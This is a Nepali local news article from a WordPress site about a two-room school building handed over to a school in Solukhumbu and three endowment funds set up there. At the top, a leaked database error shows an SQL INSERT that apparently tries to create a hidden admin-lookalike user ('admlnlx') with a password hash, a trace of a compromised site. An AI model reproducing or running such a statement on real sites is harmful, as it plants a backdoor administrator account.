WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxVLZTuDI3ns6mNdOluRZeCGbU.hAo1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 18:08:31', '', 'admlnlx', 'admlnlx')

चन्द्रोदय आविलाई दुइकोठे भवन हस्तान्तरण, तीन वटा अक्षयकोष स्थापना – Gaule Khabar

चन्द्रोदय आविलाई दुइकोठे भवन हस्तान्तरण, तीन वटा अक्षयकोष स्थापना

चन्द्रोदय आविलाई दुइकोठे भवन हस्तान्तरण, तीन वटा अक्षयकोष स्थापना

सोलुखुम्बु । माप्य दुधकोशी २ ठुलोढुङ्गामा रहेको चन्द्रोदय आधारभुत विधालय लाई दुइकोठे भवन हस्तान्तरण गरिएको छ ।

माप्यदुधकाेशी गाउँपालिका र जि एच फाउण्डेशनको साझेदारीमा निर्मित २ काेठे भवन हिजो एक कार्यक्रम वीच विधालयलाई हस्तान्तरण गरिएको हो ।

उक्त कार्यक्रममा संघीय माननीय मानवीर राईलाई ताम्र पत्र र दोसल्ला द्वारा सम्मान गरिएको छ ।

सोही कार्यक्रममा चन्द्रोदय आधाभूत विधालयको लागी. ३ वटा अक्षयकोष घोषणा गरिएको छ । चन्द्राेदय अाविका पूर्व प्र.अ. स्व.चन्द्र वहादुर राईकाे नाममा रु. ३,२०,०५५।-, पूर्व प्र.अ. भिमकुमार मगरको परिवारबाट रु ३५,०००।- थप हुनेगरी र वर्तमान प्र.अ. कुविर राईको वावाकाे नाममा रु. ७१,०००/वढ्ने गरि प्राप्त भएको विधालयले जनाएको छ ।

चन्द्रोदय आ.वि.ले क्लास रुम इन द क्लाउड, जि एज फाउण्डेसन, रिड नेपाल, अनुभोम हिमालयन ट्रस एण्ड एडुकेशन नेपाल जस्ता दातृ संस्था हरुसग सहकार्य गरिरहेको पनि बिधालयले जनाएको छ ।
वुद्धिजिवी राजकुमार राईद्वारा विगत ३ वर्ष देखि वार्षिक स्टेशनरी वितरण गर्दै अाएको कार्यक्रम ५ वर्षकाे लागि निरन्तर दिने उत्घोष गर्नुभएकोछ ।

विधालय हस्तान्तरण कार्यक्रममा संघीय संसद मानीर राई, काेशी प्रदेशका पुर्व मन्त्री माननीय बुद्धि कुमार राजभण्डारी, माप्य दुधकोशी गाउँपलिका अध्यक्ष वुद्धिकिरण राई, उपाध्यक्ष गौरव राई, नि. प्र.प्रमुख जितेन्द्र, नेकपा एमाले जिल्ला अध्यक्ष डुफ कुमार बास्तोला, शिक्षा शाखा अधिकृत गजेन्द्र भट्टराई, सगरमाथा मवि. वाकुका प्र.अ. महलसिङ राई, काकु माविका प्र.अ. बिनोद बस्नेत, हिमालय मावि खास्तापका प्र.अ. देबि राई, वासा खाली माविका प्र.अ.मानबहादुर राई स्थानीय जनप्रतिदिधी, शिक्षक र अभिभावको उपस्तिथी रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका